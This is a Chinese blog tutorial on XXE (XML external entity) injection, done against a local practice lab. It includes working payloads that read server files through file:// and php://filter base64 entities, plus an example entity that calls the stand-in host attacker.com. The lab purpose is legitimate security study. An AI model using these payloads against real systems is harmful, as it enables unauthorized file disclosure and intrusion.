xxe漏洞

最新推荐文章于 2024-09-01 20:27:25 发布
最新推荐文章于 2024-09-01 20:27:25 发布
阅读量733 收藏 7
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80280669/article/details/141749050
版权

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

一,漏洞简介。

1,xml简述。

XML(Extensible Markup Language)是一种用于标记数据的简单易读的文本格式,主要用于存储和传输数据。它的设计初衷是为了使得数据在不同的软件之间交换变得容易。XML的核心特点包括:

  1. 结构化:XML文档由标签(<tag>…</tag>)包围的数据组成,每个元素都有明确的开始和结束标签,形成了层次结构。

  2. 自定义标记:开发者可以根据需要创建自己的标签,以描述特定的应用场景或数据类型。

  3. 可扩展性:XML允许添加新的元素和属性,使其能够适应不断变化的信息需求。

  4. 纯文本格式:XML文件可以用文本编辑器直接查看,易于理解和修改。

  5. 分离内容和结构:内容和标记分开,这使得数据独立于显示样式,便于数据转换和处理。

然而,虽然XML本身并不提供强大的数据操作功能,但通常结合XPath或XSLT等技术来处理和转换XML数据。

2,漏洞简述。

XXE全称为XML External Entity Injection,即XML外部实体注入攻击,是一种常见的Web应用程序安全漏洞。它发生在处理用户提供的XML数据时,恶意用户能够利用服务器对XML外部实体文件的解析请求,注入恶意脚本或命令,从而获取敏感信息、执行任意代码甚至控制整个系统。

攻击者通过构造特殊的XML文档,包含指向不受限制的外部实体引用(如<!ENTITY x SYSTEM "http://attacker.com/command.php">),当服务器尝试解析这个XML并加载外部实体时,就会触发远程代码执行。这种漏洞常见于那些缺乏充分验证和安全配置的XML解析库中。

二,靶场搭建。

靶场地址:https://github.com/c0ny1/xxe-labhttps://github.com/c0ny1/xxe-lab1,将其下载到phpstudy的www文件夹下,并解压。

3b4a6780ae2f4a77bd14150afc735dff.png下载好后,可以看到,内部有很多不同的压缩问文件,仅解压php版本即可。

解压后,新建网站,就可以直接使用。

30ca5f21f35c479dbd5c54c9b6d9dcb8.png使用本机ip打开后:

e7d918c4835341bd838586b59d922d92.png三,攻击测试。

1,进行抓包。

686d61704aee4f8f8f69a63e94c61f0a.png

在交互界面输入:账户为:admin;密码为:root,并抓包。

29dd01b797b54da492f7f0a5f5205ec2.png账号密码传输数据的格式是 xml,可以考虑在这里传输其他的恶意数据,因为登录口传输的既然是 xml 数据,那么后端接收的时候,肯定是 xml 解析,既能会解析,那么我们就传恶意的 xml 数据给它解析,让他执行。

2,将其发送到重放器中进行编辑。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "file:///F:\phpstudy_pro\WWW\g.php">]>
<user><username>&fl;</username><password>asdf</password></user>

5f5ce7667612459aae021c85cb5f38a6.png

在本地新建php文件,尝试读取。

d33987da712c4bffb604b3c9077dea6c.png4351627b68ab4b7faea1ebbb6625ee18.png测试失败,此处应使用php伪协议,并使用base64进行读取。


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=f:/g.txt">]>
<user><username>&fl;</username><password>asdf</password></user>

8a502e44d0a24dd59dc1588f29f6c8ad.png读取成功。

 

 

影•逝
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞
2301_80337881的博客
03-30 2055
XML(Extensible Markup Language)是一种类似于HTML,但是没有使用预定义标记的语言。因此,可以根据自己的设计需求定义专属的标记。这是一种强大将数据存储在一个可以存储、搜索和共享的格式中的方法。最重要的是,因为 XML 的基本格式是标准化的,如果你在本地或互联网上跨系统或平台共享或传输 XML,由于标准化的 XML 语法,接收者仍然可以解析数据。举个例子:假设一个微信群里面小明发了一条消息“你吃过没”。
XXE漏洞笔记
qq_32812063的博客
11-26 638
XXE
XXE 漏洞及案例实战
来日可期的博客
09-24 2637
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XXE漏洞简介
记录学习
06-01 1013
XXE漏洞简介
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
未知攻焉知防——XXE漏洞攻防.pdf
09-18
XXE漏洞全称为XML External Entity Injection,即XML外部实体注入漏洞,是一种在应用程序中处理XML数据时出现的安全漏洞。本文将详细介绍XML的基础知识、XXE漏洞的攻击原理、影响以及防御措施。 XML(可扩展标记...
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 1084
然后看它们之间的各种各样的依赖关系
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 1255
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
k8s安全
ljj19910401的博客
08-29 792
Kubernetes(k8s)的安全机制是围绕保护其API Server来设计的,主要包括认证(Authentication)、鉴权(Authorization)和准入控制(Admission Control)三个核心环节。
危化品如何在室外安全暂存
SAVEST的博客
08-29 885
危化品是指具有毒害、腐蚀、爆炸、燃烧、助燃等性质,对人体、设施、环境具有危害的剧毒化学品和其他化学品。在生产、使用、储存和运输过程中,危化品都需要严格的安全措施和合规操作。室外暂存是指将危化品在室外指定区域进行短期储存,以便后续处理或转运。这种存储方式在危化品管理中具有重要意义,但在实践中也面临着安全管理和效率的挑战。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
08-31 834
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
23. 如何使用Collections.synchronizedList()方法来创建线程安全的集合?有哪些注意事项?
zhzjn的博客
08-31 670
复合操作是指多个操作组成的逻辑单元,如遍历集合和修改集合的操作结合在一起时。是在写操作时创建集合的副本,而读操作可以无锁进行,因此在读多写少的场景中具有较好的性能。在多线程环境下,选择合适的集合类型和同步机制至关重要,这取决于应用的具体需求和并发程度。确保了对单个方法调用的线程安全性,但在某些复合操作中(如遍历集合),仍然需要进行。如果在实际应用中存在大量并发读操作,而写操作较少,可以考虑使用其他并发集合类,如。,这些类提供了更细粒度的锁和更高效的并发处理机制,通常在高并发场景下表现更好。
深度解读并发安全集合的原理及源码
DougLiang的博客
09-01 1005
本节主要介绍J.U.C包中的几种并发安全集合:ConcurrentHashMap,ConcurrentLinkedQueue,和ConcurrentLinkedDeque。所谓并发安全集合,相对于普通集合来说,能够保证在多线程环境下向集合中添加数据时的线程安全性。主要讲ConcurrentHashMap在实现线程安全性方面对性能和安全性的合理平衡。
【BLE】四.SMP安全配对详解
u013115811的博客
09-01 576
Paring(配对):配对能力交换,设备认证,密钥生成,连接加密以及机密信息分发等过程Bonding(绑定)配对中会生成一个长期密钥(LTK,long-term Key),双方把在Flash,那么这两个设备再次重连就可,且直接使用LTK对蓝牙连接进行加密;不存储LTK(不分发LTK),paring完成后连接也是加密的,但重连需再次进行paring流程,否则两者还是明文通信;
WorkPlus安全即时通讯:端到端加密开启信息保密新时代
最新发布
weixin_53855915的博客
09-01 650
作为一款拥有端到端加密功能的通讯平台,WorkPlus着重于保护用户的通讯隐私,并开启了一个全新的信息保密时代。最后,企业和个人在选择保密通讯工具时,应仔细评估其信誉和安全性,并采取额外的安全措施,如定期更新和强化设备密码、避免使用不受信任的公共Wi-Fi网络等。安全审计和监控:WorkPlus提供日志审计和监控功能,企业管理员可以对通讯记录进行审计和监控,以进一步确保通讯的合规和安全。即时文本和语音通话:WorkPlus提供安全的即时文本和语音通话功能,通过端到端加密确保通讯内容的保密性。
SSL证书如何保护IP地址的安全
alsknv的博客
08-28 465
这样,客户端与CDN之间的通信是加密的,而CDN与源服务器之间的通信则可以在内部网络中进行,从而避免源服务器IP地址的直接暴露。这意味着,当数据通过IP地址在客户端和服务器之间传输时,SSL证书能够确保这些数据被加密,从而防止第三方在传输过程中截取和篡改数据。通过HTTPS连接,客户端和服务器之间的所有通信都被加密,即使数据被截获,也无法被未授权的第三方轻易解密。综上所述,SSL证书通过数据加密、建立安全连接、身份验证、增强用户信任以及与其他安全措施结合使用等方式来保护IP地址的安全
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值